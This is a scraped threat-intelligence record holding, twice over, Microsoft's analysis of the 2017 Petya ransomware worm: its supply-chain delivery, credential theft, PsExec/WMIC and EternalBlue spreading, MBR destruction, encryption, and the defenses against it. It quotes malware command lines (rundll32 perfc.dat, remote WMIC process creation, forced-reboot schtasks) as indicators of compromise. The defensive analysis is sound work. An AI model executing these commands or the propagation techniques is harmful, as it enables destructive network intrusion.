to _dllhost.dat_) from an embedded resource within the malware. It then scans the local network for _admin$_ shares, copies itself across the network, and executes the newly copied malware binary remotely using PSEXEC.\n\nIn addition to credential dumping, the malware also tries to steal credentials by using the _CredEnumerateW_ function to get all the other user credentials potentially stored on the credential store. If a credential name starts with _\"TERMSRV/\"_ and the type is set as 1 (generic) it uses that credential to propagate through the network.\n\n\n\n_Ransomware code responsible for accessing \\\\\\Admin$ shares on different machines_\n\nThis ransomware also uses the Windows Management Instrumentation Command-line (WMIC) to find remote shares (using _NetEnum/NetAdd_) to spread to. It uses either a duplicate token of the current user (for existing connections), or a username/password combination (spreading through legit tools).\n\n\n\n_Screenshot showing launch of malware on a remote machine using WMIC_\n\n## Lateral movement using EternalBlue and EternalRomance\n\nThe new ransomware can also spread using an exploit for the Server Message Block (SMB) vulnerability [CVE-2017-0144](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>) (also known as EternalBlue), which was fixed in [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) and was also exploited by [WannaCrypt](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>) to spread to out-of-date machines. In addition, this ransomware also uses a second exploit for [CVE-2017-0145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>) (also known as EternalRomance, and fixed by the same bulletin).\n\nWe\u2019ve seen this ransomware attempt to use these exploits by generating SMBv1 packets (which are all _XOR 0xCC_ encrypted) to trigger these vulnerabilities at the following address of the malware code:\n\n\n\n\n\nThese two exploits were leaked by a group called [Shadow Brokers](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>). However, it is important to note that both of these vulnerabilities have been fixed by Microsoft in [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) on March 14, 2017.\n\nMachines that are patched against these exploits (with [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)) or [have disabled SMBv1](<https://support.microsoft.com/kb/2696547>) are not affected by this particular spreading mechanism. Please refer to our previous [blog](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>) for details on these exploits and how modern Windows 10 mitigations can help to contain similar threats.\n\n## Encryption\n\nThis ransomware\u2019s encryption behavior depends on the malware process privilege level and the processes found to be running on the machine. It does this by employing a simple XOR-based hashing algorithm on the process names, and checks against the following hash values to use as a behavior exclusion:\n\n\n\n * _0x6403527E_ or _0x651B3005_ \u2013 if these hashes of process names are found running on the machine, then the ransomware does not do SMB exploitation.\n\n\n\n * _0x2E214B44 _ \u2013 if a process with this hashed name is found, the ransomware trashes the first 10 sectors of _\\\\\\\\\\\\\\\\.\\\\\\PhysicalDrive0_, including the MBR\n\n\n\nThis ransomware then writes to the master boot record (MBR) and then sets up the system to reboot. It sets up scheduled tasks to shut down the machine after at least 10 minutes past the current time. The exact time is random _(GetTickCount())_. For example:\n\n_schtasks /Create /SC once /TN \"\" /TR \"&lt;system folder&gt;\\shutdown.exe /r /f\" /ST 14:23_\n\nAfter successfully modifying the MBR, it displays the following fake system message, which notes a supposed error in the drive and shows the fake integrity checking:\n\n\n\nIt then displays this ransom note:\n\n\n\nOnly if the malware is running with highest privilege (i.e., with _SeDebugPrivilege_ enabled), it tries to overwrite the MBR code.\n\nThis ransomware attempts to encrypt all files with the following file name extensions in all folders in all fixed drives, except for _C:\\Windows_:\n\n.3ds | .7z | .accdb | .ai \n---|---|---|--- \n.asp | .aspx | .avhd | .back \n.bak | .c | .cfg | .conf \n.cpp | .cs | .ctl | .dbf \n.disk | .djvu | .doc | .docx \n.dwg | .eml | .fdb | .gz \n.h | .hdd | .kdbx | .mail \n.mdb | .msg | .nrg | .ora \n.ost | .ova | .ovf | .pdf \n.php | .pmf | .ppt | .pptx \n.pst | .pvi | .py | .pyc \n.rar | .rtf | .sln | .sql \n.tar | .vbox | .vbs | .vcb \n.vdi | .vfd | .vmc | .vmdk \n.vmsd | .vmx | .vsdx | .vsv \n.work | .xls | .xlsx | .xvd \n.zip | | | \n \nIt uses file mapping APIs instead of a usual _ReadFile()_/_WriteFile()_ APIs:\n\n\n\nUnlike most other ransomware, this threat does not append a new file name extension to encrypted files. Instead, it overwrites the said files.\n\nThe AES key generated for encryption is per machine, per fixed drive, and gets exported and encrypted using the embedded 2048-bit RSA public key of the attacker.\n\n\n\n_Embedded RSA public key_\n\n\n\n_Code exporting the AES 128 bit key per machine, per fixed drive in the machine and encrypting it using embedded RSA public key during export_\n\nThe unique key used for files encryption (AES) is added, in encrypted form, to the _README.TXT_ file the threat writes under section _\"Your personal installation key:\"_.\n\nBeyond encrypting files, this ransomware also attempts to infect the MBR or destroy certain sectors of VBR and MBR:\n\n\n\nAfter completing its encryption routine, this ransomware drops a text file called _README.TXT_ in each fixed drive. The said file has the following text:\n\n\n\nThis ransomware also clears the System, Setup, Security, Application event logs and deletes NTFS journal info.\n\n## Detection and investigation with Windows Defender Advanced Threat Protection\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) is a post-breach solution and offers by-design detections for this attack without need of any signature updates. Windows Defender ATP sensors constantly monitor and collect telemetry from the endpoints and offers machine-learning detections for common lateral movement techniques and tools used by this ransomware, including, for example, the execution of _PsExec.exe_ with different filename, and the creation of the _perfc.dat_ file in remote shares (UNC) paths.\n\nToday, without the need of additional updates, an infected machine may look like this:\n\n\n\nThe second alert targets the distribution of the ransomware\u2019s .dll file over the network. This event provides helpful information during investigation as it includes the User context that was used to move the file remotely. This user has been compromised and could represent the user associated with patient-zero:\n\n\n\nWith Windows Defender ATP, enterprise customers are well-equipped to quickly identify Petya outbreaks, investigate the scope of the attack, and respond early to malware delivery campaigns.\n\n## Protection against this new ransomware attack\n\nKeeping your [Windows 10](<https://www.microsoft.com/en-us/windows/windows-10-upgrade>) [up-to-date](<https://support.microsoft.com/en-us/help/311047/how-to-keep-your-windows-computer-up-to-date>) gives you the benefits of the latest features and proactive mitigations built into the latest versions of Windows. In Creators Update, we further [hardened Windows 10 against ransomware attacks](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>) by introducing new next-gen technologies and enhancing existing ones.\n\nAs another layer of protection, [Windows 10 S](<https://www.microsoft.com/en-us/windows/windows-10-s>) only allows apps that come from the Windows Store to run. Windows 10 S users are further protected from this threat.\n\nWe recommend customers that have not yet installed security update [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) to do so as soon as possible. Until you can apply the patch, we also recommend two possible workarounds to reduce the attack surface:\n\n * Disable SMBv1 with the steps documented at [Microsoft Knowledge Base Article 2696547](<https://support.microsoft.com/kb/2696547>) and as [recommended previously](<https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/>)\n * Consider adding a rule on your router or firewall to block incoming SMB traffic on port 445\n\nAs the threat targets ports 139 and 445, you customers can block any traffic on those ports to prevent propagation either into or out of machines in the network. You can also disable remote WMI and file sharing. These may have large impacts on the capability of your network, but may be suggested for a very short time period while you assess the impact and [apply definition updates](<https://www.microsoft.com/security/portal/definitions/adl.aspx>).\n\nAside from exploiting vulnerabilities, this threat can also spread across networks by stealing credentials, which it then uses to attempt to copy and execute a copy on remote machines. You can prevent credential theft by ensuring credential hygiene across the organization. [Secure privileged access](<https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access>) to prevent the spread of threats like Petya and to protect your organization\u2019s assets. Use [Credential Guard](<https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard>) to protect domain credentials stored in the Windows Credential Store.\n\nWindows Defender Antivirus detects this threat as [Ransom:Win32/Petya](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/entry.aspx?Name=Ransom:Win32/Petya>) as of the [1.247.197.0 update](<https://www.microsoft.com/security/portal/definitions/adl.aspx>). Windows Defender Antivirus uses cloud-based protection, helping to protect you from the latest threats.\n\nFor enterprises, use [Device Guard](<https://technet.microsoft.com/itpro/windows/keep-secure/device-guard-deployment-guide>) to lock down devices and provide kernel-level virtualization-based security, allowing only trusted applications to run, effectively preventing malware from running.\n\nMonitor networks with [Windows Defender Advanced Threat Protection](<http://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>), which alerts security operations teams about suspicious activities. Download this playbook to see how you can leverage Windows Defender ATP to detect, investigate, and mitigate ransomware in networks: [Windows Defender Advanced Threat Protection \u2013 Ransomware response playbook](<https://www.microsoft.com/en-us/download/details.aspx?id=55090>).\n\n## Resources\n\nMSRC blog: <https://blogs.technet.microsoft.com/msrc/2017/06/28/update-on-petya-malware-attacks/>\n\nNext-generation ransomware protection with Windows 10 Creators Update: <https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>\n\nDownload English language security updates: [Windows Server 2003 SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows Server 2003 SP2 x86,](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x86-custom-enu_f617caf6e7ee6f43abe4b386cb1d26b3318693cf.exe>) [Windows XP SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows XP SP3 x86](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-custom-enu_eceb7d5023bbb23c0dc633e46b9c2f14fa6ee9dd.exe>), [Windows XP Embedded SP3 x86](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-embedded-custom-enu_8f2c266f83a7e1b100ddb9acd4a6a3ab5ecd4059.exe>), [Windows 8 x86,](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x86_a0f1c953a24dd042acc540c59b339f55fb18f594.msu>) [Windows 8 x64](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x64_f05841d2e94197c2dca4457f1b895e8f632b7f8e.msu>)\n\nDownload localized language security updates: [Windows Server 2003 SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=d3cb7407-3339-452e-8371-79b9c301132e>), [Windows Server 2003 SP2 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=350ec04d-a0ba-4a50-9be3-f900dafeddf9>), [Windows XP SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=5fbaa61b-15ce-49c7-9361-cb5494f9d6aa>), [Windows XP SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=7388c05d-9de6-4c6a-8b21-219df407754f>), [Windows XP Embedded SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=a1db143d-6ad2-4e7e-9e90-2a73316e1add>), [Windows 8 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=6e2de6b7-9e43-4b42-aca2-267f24210340>), [Windows 8 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=b08bb3f1-f156-4e61-8a68-077963bae8c0>)\n\nMS17-010 Security Update: <https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>\n\nGeneral information on ransomware: <https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>\n\nSecurity for IT Pros: <https://technet.microsoft.com/en-us/security/default>\n\n## Indicators of Compromise\n\nNetwork defenders may search for the following indicators:\n\n**File indicators**\n\n * 34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d\n * 9717cfdc2d023812dbc84a941674eb23a2a8ef06\n * 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf\n * 56c03d8e43f50568741704aee482704a4f5005ad\n\n**Command lines**\n\nIn environments where command-line logging is available, the following command lines may be searched:\n\n * Scheduled Reboot Task: Petya schedules a reboot for a random time between 10 and 60 minutes from the current time \n * _schtasks /Create /SC once /TN \"\" /TR \"&lt;system folder&gt;\\shutdown.exe /r /f\" /ST &lt;time&gt;_\n * _cmd.exe /c schtasks /RU \"SYSTEM\" /Create /SC once /TN \"\" /TR \"C:\\Windows\\system32\\shutdown.exe /r /f\" /ST &lt;time&gt;_\n\nThis may be surfaced by searching for EventId 106 (General Task Registration) which captures tasks registered with the Task Scheduler service.\n\n * Lateral Movement (Remote WMI) \n * _\"process call create \\\"C:\\\\\\Windows\\\\\\System32\\\\\\rundll32.exe \\\\\\\\\\\"C:\\\\\\Windows\\\\\\perfc.dat\\\\\\\\\\\" #1\"_\n\n**Network indicators**\n\nIn environments where NetFlow data are available, this ransomware\u2019s subnet-scanning behavior may be observed by looking for the following:\n\n * Workstations scanning ports tcp/139 and tcp/445 on their own local (/24) network scope\n * Servers (in particular, domain controllers) scanning ports tcp/139 and tcp/445 across multiple /24 scopes\n\n_ _", "edition": 1, "enchantments": {"dependencies": {"modified": "2017-09-15T09:08:41", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:E537BA51663A720821A67D2A4F7F7F0E"], "type": "mmpc"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0144"], "type": "mscve"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C", "SECURELIST:094B9FCE59977DD96C94BBF6A95D339E"], "type": "securelist"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["SMNTC-96705", "SMNTC-96704"], "type": "symantec"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD"], "type": "threatpost"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:98069D08913ADA26D85B10C827D3FE97"], "type": "avleonov"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031"], "type": "exploitdb"}, {"idList": ["MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"], "type": "mssecure"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:E18080D17705880B2E7B69B8AB125EA9", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["CVE-2017-0144", "CVE-2017-0145"], "type": "cve"}, {"idList": ["RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"], "type": "rapid7blog"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"], "type": "saint"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2017-09-15T09:08:41", "rev": 2, "value": 7.6, "vector": "NONE"}}, "hash": "00bc14448de35f88f178d40771869aa7b7924e1139d3cc785a5a94c9694749b1", "hashmap": [{"hash": "baa30f28b70995adbfcbcd6ddaba2ec0", "key": "title"}, {"hash": "9158c03164fb6db0c440fdb287e68855", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "696a19be15ef6061e7b6c7e4759f53bb", "key": "published"}, {"hash": "126ac9f6149081eb0e97c2e939eaad52", "key": "bulletinFamily"}, {"hash": "696a19be15ef6061e7b6c7e4759f53bb", "key": "modified"}, {"hash": "ff956db5f2cf47d328e1cbc09bc91885", "key": "description"}, {"hash": "2206031ddfa442c2eb57dd17e9fcf174", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "10dc22e225dabcc0845efb8de70d835b", "key": "href"}, {"hash": "2ed33d64012a372c3bd45d454ea4fb3b", "key": "cvelist"}], "history": [], "href": "https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/", "id": "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "immutableFields": [], "lastseen": "2017-09-15T09:08:41", "modified": "2017-06-28T06:57:43", "objectVersion": "1.5", "published": "2017-06-28T06:57:43", "references": [], "reporter": "msft-mmpc", "title": "New ransomware, old techniques: Petya adds worm capabilities", "type": "mmpc", "viewCount": 952}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2017-09-15T09:08:41"}, {"bulletin": {"bulletinFamily": "blog", "cvelist": ["CVE-2017-0144", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "_(Note: We have published a follow-up blog entry on this ransomware attack. We have new findings from our continued investigation, as well as platform mitigation and protection information: [Windows 10 platform resilience against the Petya ransomware attack](<https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/>).)_\n\n \n\nOn June 27, 2017 reports of a [ransomware](<https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>) infection began spreading across Europe. We saw the first infections in Ukraine, where more than 12,500 machines encountered the threat. We then observed infections in another 64 countries, including Belgium, Brazil, Germany, Russia, and the United States.\n\nThe new ransomware has worm capabilities, which allows it to move laterally across infected networks. Based on our investigation, this new ransomware shares similar codes and is a new variant of [Ransom:Win32/Petya](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/Petya>). This new strain of ransomware, however, is more sophisticated.\n\nTo protect our customers, we released cloud-delivered protection updates and made updates to our signature definition packages shortly after. These updates were automatically delivered to all Microsoft free antimalware products, including [Windows Defender Antivirus](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) and Microsoft Security Essentials. You can download the latest version of these files manually at the [Malware Protection Center](<https://www.microsoft.com/security/portal/definitions/adl.aspx>).\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) automatically detects behaviors used by this new ransomware variant without any updates.\n\n## Delivery and installation\n\nInitial infection appears to involve a software supply-chain threat involving the Ukrainian company M.E.Doc, which develops tax accounting software, MEDoc. Although this vector was speculated at length by news media and security researchers\u2014including Ukraine\u2019s own Cyber Police\u2014there was only circumstantial evidence for this vector. Microsoft now has evidence that a few active infections of the ransomware initially started from the legitimate MEDoc updater process. As we highlighted previously, [software supply chain attacks](<https://blogs.technet.microsoft.com/mmpc/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/>) are a recent dangerous trend with attackers, and it requires advanced defense.\n\nWe observed telemetry showing the MEDoc software updater process (_EzVit.exe)_ executing a malicious command-line matching this exact attack pattern on Tuesday, June 27 around 10:30 a.m. GMT.\n\nThe execution chain leading to the ransomware installation is represented in the diagram below and essentially confirms that_ EzVit.exe_ process from MEDoc, for unknown reasons, at some moment executed the following command-line:\n\n_C:\\\\\\Windows\\\\\\system32\\\\\\rundll32.exe\\\" \\\"C:\\\\\\ProgramData\\\\\\perfc.dat\\\",#1 30_\n\n\n\nThe same update vector was also mentioned by the Ukraine Cyber Police in a public list of indicators of compromise (IOCs) , which includes the MEDoc updater.\n\n## A single ransomware, multiple lateral movement techniques\n\nGiven this new ransomware's added lateral movement capabilities it only takes a single infected machine to affect a network. The ransomware spreading functionality is composed of multiple methods responsible for:\n\n * stealing credentials or re-using existing active sessions\n * using file-shares to transfer the malicious file across machines on the same network\n * using existing legitimate functionalities to execute the payload or abusing SMB vulnerabilities for unpatched machines\n\nIn the next sections, we discuss the details of each technique.\n\n## Lateral movement using credential theft and impersonation\n\nThis ransomware drops a credential dumping tool (typically as a .tmp file in the _%Temp%_ folder) that shares code similarities with [Mimikatz](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=HackTool:Win32/Mimikatz>) and comes in 32-bit and 64-bit variants. Because users frequently log in using accounts with local admin privileges and have active sessions opens across multiple machines, stolen credentials are likely to provide the same level of access the user has on other machines.\n\nOnce the ransomware has valid credentials, it scans the local network to establish valid connections on ports _tcp/139_ and _tcp/445_. A special behavior is reserved for Domain Controllers or servers: this ransomware attempts to call _DhcpEnumSubnets()_ to enumerate DHCP subnets; for each subnet, it gathers all hosts/clients (using _DhcpEnumSubnetClients()_) for scanning for _tcp/139_ and _tcp/445_ services. If it gets a response, the malware attempts to copy a binary on the remote machine using regular file-transfer functionalities with the stolen credentials.\n\nIt then tries to execute remotely the malware using either PSEXEC or WMIC tools.\n\nThe ransomware attempts to drop the legitimate _psexec.exe_ (typically renamed to _dllhost.dat_) from an embedded resource within the malware. It then scans the local network for _admin$_ shares, copies itself across the network, and executes the newly copied malware binary remotely using PSEXEC.\n\nIn addition to credential dumping, the malware also tries to steal credentials by using the _CredEnumerateW_ function to get all the other user credentials potentially stored on the credential store. If a credential name starts with _\"TERMSRV/\"_ and the type is set as 1 (generic) it uses that credential to propagate through the network.\n\n\n\n_Ransomware code responsible for accessing \\\\\\Admin$ shares on different machines_\n\nThis ransomware also uses the Windows Management Instrumentation Command-line (WMIC) to find remote shares (using _NetEnum/NetAdd_) to spread to. It uses either a duplicate token of the current user (for existing connections), or a username/password combination (spreading through legit tools).\n\n\n\n_Screenshot showing launch of malware on a remote machine using WMIC_\n\n## Lateral movement using EternalBlue and EternalRomance\n\nThe new ransomware can also spread using an exploit for the Server Message Block (SMB) vulnerability [CVE-2017-0144](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>) (also known as EternalBlue), which was fixed in [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) and was also exploited by [WannaCrypt](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>) to spread to out-of-date machines. In addition, this ransomware also uses a second exploit for [CVE-2017-0145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>) (also known as EternalRomance, and fixed by the same bulletin).\n\nWe\u2019ve seen this ransomware attempt to use these exploits by generating SMBv1 packets (which are all _XOR 0xCC_ encrypted) to trigger these vulnerabilities at the following address of the malware code:\n\n\n\n\n\nThese two exploits were leaked by a group called [Shadow Brokers](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>). However, it is important to note that both of these vulnerabilities have been fixed by Microsoft in [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) on March 14, 2017.\n\nMachines that are patched against these exploits (with [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)) or [have disabled SMBv1](<https://support.microsoft.com/kb/2696547>) are not affected by this particular spreading mechanism. Please refer to our previous [blog](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>) for details on these exploits and how modern Windows 10 mitigations can help to contain similar threats.\n\n## Encryption\n\nThis ransomware\u2019s encryption behavior depends on the malware process privilege level and the processes found to be running on the machine. It does this by employing a simple XOR-based hashing algorithm on the process names, and checks against the following hash values to use as a behavior exclusion:\n\n\n\n * _0x6403527E_ or _0x651B3005_ \u2013 if these hashes of process names are found running on the machine, then the ransomware does not do SMB exploitation.\n\n\n\n * _0x2E214B44 _ \u2013 if a process with this hashed name is found, the ransomware trashes the first 10 sectors of _\\\\\\\\\\\\\\\\.\\\\\\PhysicalDrive0_, including the MBR\n\n\n\nThis ransomware then writes to the master boot record (MBR) and then sets up the system to reboot. It sets up scheduled tasks to shut down the machine after at least 10 minutes past the current time. The exact time is random _(GetTickCount())_. For example:\n\n_schtasks /Create /SC once /TN \"\" /TR \"&lt;system folder&gt;\\shutdown.exe /r /f\" /ST 14:23_\n\nAfter successfully modifying the MBR, it displays the following fake system message, which notes a supposed error in the drive and shows the fake integrity checking:\n\n\n\nIt then displays this ransom note:\n\n\n\nOnly if the malware is running with highest privilege (i.e., with _SeDebugPrivilege_ enabled), it tries to overwrite the MBR code.\n\nThis ransomware attempts to encrypt all files with the following file name extensions in all folders in all fixed drives, except for _C:\\Windows_:\n\n.3ds | .7z | .accdb | .ai \n---|---|---|--- \n.asp | .aspx | .avhd | .back \n.bak | .c | .cfg | .conf \n.cpp | .cs | .ctl | .dbf \n.disk | .djvu | .doc | .docx \n.dwg | .eml | .fdb | .gz \n.h | .hdd | .kdbx | .mail \n.mdb | .msg | .nrg | .ora \n.ost | .ova | .ovf | .pdf \n.php | .pmf | .ppt | .pptx \n.pst | .pvi | .py | .pyc \n.rar | .rtf | .sln | .sql \n.tar | .vbox | .vbs | .vcb \n.vdi | .vfd | .vmc | .vmdk \n.vmsd | .vmx | .vsdx | .vsv \n.work | .xls | .xlsx | .xvd \n.zip | | | \n \nIt uses file mapping APIs instead of a usual _ReadFile()_/_WriteFile()_ APIs:\n\n\n\nUnlike most other ransomware, this threat does not append a new file name extension to encrypted files. Instead, it overwrites the said files.\n\nThe AES key generated for encryption is per machine, per fixed drive, and gets exported and encrypted using the embedded 2048-bit RSA public key of the attacker.\n\n\n\n_Embedded RSA public key_\n\n\n\n_Code exporting the AES 128 bit key per machine, per fixed drive in the machine and encrypting it using embedded RSA public key during export_\n\nThe unique key used for files encryption (AES) is added, in encrypted form, to the _README.TXT_ file the threat writes under section _\"Your personal installation key:\"_.\n\nBeyond encrypting files, this ransomware also attempts to infect the MBR or destroy certain sectors of VBR and MBR:\n\n\n\nAfter completing its encryption routine, this ransomware drops a text file called _README.TXT_ in each fixed drive. The said file has the following text:\n\n\n\nThis ransomware also clears the System, Setup, Security, Application event logs and deletes NTFS journal info.\n\n## Detection and investigation with Windows Defender Advanced Threat Protection\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) is a post-breach solution and offers by-design detections for this attack without need of any signature updates. Windows Defender ATP sensors constantly monitor and collect telemetry from the endpoints and offers machine-learning detections for common lateral movement techniques and tools used by this ransomware, including, for example, the execution of _PsExec.exe_ with different filename, and the creation of the _perfc.dat_ file in remote shares 